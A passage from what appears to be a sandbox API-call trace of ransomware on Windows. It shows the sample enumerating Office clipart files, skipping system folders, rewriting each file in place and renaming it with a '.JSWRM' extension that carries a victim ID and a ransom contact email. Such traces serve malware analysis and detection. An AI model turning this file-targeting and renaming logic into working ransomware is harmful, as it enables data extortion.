hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0095.473] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01395_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl01395_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01395_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl01395_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0095.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0095.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0095.473] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102ed99a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6cc4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SL01565_.WMF", cAlternateFileName="")) returned 1 [0095.473] lstrcmpiW (lpString1="SL01565_.WMF", lpString2=".") returned 1 [0095.473] lstrcmpiW (lpString1="SL01565_.WMF", lpString2="..") returned 1 [0095.474] lstrcmpiW (lpString1="SL01565_.WMF", lpString2="...") returned 1 [0095.474] lstrcmpiW (lpString1="SL01565_.WMF", lpString2="windows") returned -1 [0095.474] lstrcmpiW (lpString1="SL01565_.WMF", lpString2="recovery") returned 1 [0095.474] lstrcmpiW (lpString1="SL01565_.WMF", lpString2="perflogs") returned 1 [0095.474] lstrcmpiW (lpString1="SL01565_.WMF", lpString2="documents and settings") returned 1 [0095.474] lstrcmpiW (lpString1="SL01565_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.474] lstrcmpiW (lpString1="SL01565_.WMF", lpString2="system volume information") returned -1 [0095.474] lstrcmpiW (lpString1="SL01565_.WMF", lpString2="msocache") returned 1 [0095.474] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0095.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL01565_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL01565_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SL01565_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0095.474] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0095.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL01565_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL01565_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SL01565_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0095.474] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0095.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0095.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.474] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0095.474] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01565_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl01565_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.474] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=27844) returned 1 [0095.475] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6cc0) returned 0x24d210 [0095.475] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6cc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6cc0, lpOverlapped=0x0) returned 1 [0095.479] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.479] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6cc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6cc0, lpOverlapped=0x0) returned 1 [0095.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.480] CloseHandle (hObject=0x314) returned 1 [0095.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0095.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0095.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0095.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0095.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0095.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0095.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0095.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0095.480] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01565_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl01565_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01565_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl01565_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0095.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0095.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0095.481] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102ed99a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x36aa, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00017_.WMF", cAlternateFileName="")) returned 1 [0095.482] lstrcmpiW (lpString1="SO00017_.WMF", lpString2=".") returned 1 [0095.482] lstrcmpiW (lpString1="SO00017_.WMF", lpString2="..") returned 1 [0095.482] lstrcmpiW (lpString1="SO00017_.WMF", lpString2="...") returned 1 [0095.482] lstrcmpiW (lpString1="SO00017_.WMF", lpString2="windows") returned -1 [0095.482] lstrcmpiW (lpString1="SO00017_.WMF", lpString2="recovery") returned 1 [0095.482] lstrcmpiW (lpString1="SO00017_.WMF", lpString2="perflogs") returned 1 [0095.482] lstrcmpiW (lpString1="SO00017_.WMF", lpString2="documents and settings") returned 1 [0095.482] lstrcmpiW (lpString1="SO00017_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.482] lstrcmpiW (lpString1="SO00017_.WMF", lpString2="system volume information") returned -1 [0095.482] lstrcmpiW (lpString1="SO00017_.WMF", lpString2="msocache") returned 1 [0095.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0095.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00017_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00017_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00017_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0095.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0095.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00017_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00017_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00017_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0095.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0095.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0095.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.482] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0095.482] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00017_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00017_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.483] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13994) returned 1 [0095.483] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x36a0) returned 0x24d210 [0095.483] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x36a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x36a0, lpOverlapped=0x0) returned 1 [0095.486] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.486] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x36a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x36a0, lpOverlapped=0x0) returned 1 [0095.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.486] CloseHandle (hObject=0x314) returned 1 [0095.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0095.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0095.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0095.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0095.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0095.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0095.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0095.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0095.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0095.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0095.487] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00017_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00017_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00017_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00017_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0095.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0095.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0095.489] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102ed99a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32f6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00018_.WMF", cAlternateFileName="")) returned 1 [0095.489] lstrcmpiW (lpString1="SO00018_.WMF", lpString2=".") returned 1 [0095.489] lstrcmpiW (lpString1="SO00018_.WMF", lpString2="..") returned 1 [0095.489] lstrcmpiW (lpString1="SO00018_.WMF", lpString2="...") returned 1 [0095.489] lstrcmpiW (lpString1="SO00018_.WMF", lpString2="windows") returned -1 [0095.489] lstrcmpiW (lpString1="SO00018_.WMF", lpString2="recovery") returned 1 [0095.490] lstrcmpiW (lpString1="SO00018_.WMF", lpString2="perflogs") returned 1 [0095.490] lstrcmpiW (lpString1="SO00018_.WMF", lpString2="documents and settings") returned 1 [0095.490] lstrcmpiW (lpString1="SO00018_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.490] lstrcmpiW (lpString1="SO00018_.WMF", lpString2="system volume information") returned -1 [0095.490] lstrcmpiW (lpString1="SO00018_.WMF", lpString2="msocache") returned 1 [0095.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0095.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00018_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00018_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00018_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0095.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0095.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00018_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00018_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00018_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0095.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0095.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0095.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0095.490] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00018_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00018_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.491] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13046) returned 1 [0095.491] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x32f0) returned 0x24d210 [0095.491] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x32f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x32f0, lpOverlapped=0x0) returned 1 [0095.493] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.493] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x32f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x32f0, lpOverlapped=0x0) returned 1 [0095.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.493] CloseHandle (hObject=0x314) returned 1 [0095.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0095.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0095.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0095.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0095.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0095.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0095.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0095.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0095.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.494] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00018_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00018_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00018_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00018_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0095.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0095.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0095.494] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10313bcd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10313bcd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10313bcd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7a80, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00152_.WMF", cAlternateFileName="")) returned 1 [0095.495] lstrcmpiW (lpString1="SO00152_.WMF", lpString2=".") returned 1 [0095.495] lstrcmpiW (lpString1="SO00152_.WMF", lpString2="..") returned 1 [0095.495] lstrcmpiW (lpString1="SO00152_.WMF", lpString2="...") returned 1 [0095.495] lstrcmpiW (lpString1="SO00152_.WMF", lpString2="windows") returned -1 [0095.495] lstrcmpiW (lpString1="SO00152_.WMF", lpString2="recovery") returned 1 [0095.495] lstrcmpiW (lpString1="SO00152_.WMF", lpString2="perflogs") returned 1 [0095.495] lstrcmpiW (lpString1="SO00152_.WMF", lpString2="documents and settings") returned 1 [0095.495] lstrcmpiW (lpString1="SO00152_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.495] lstrcmpiW 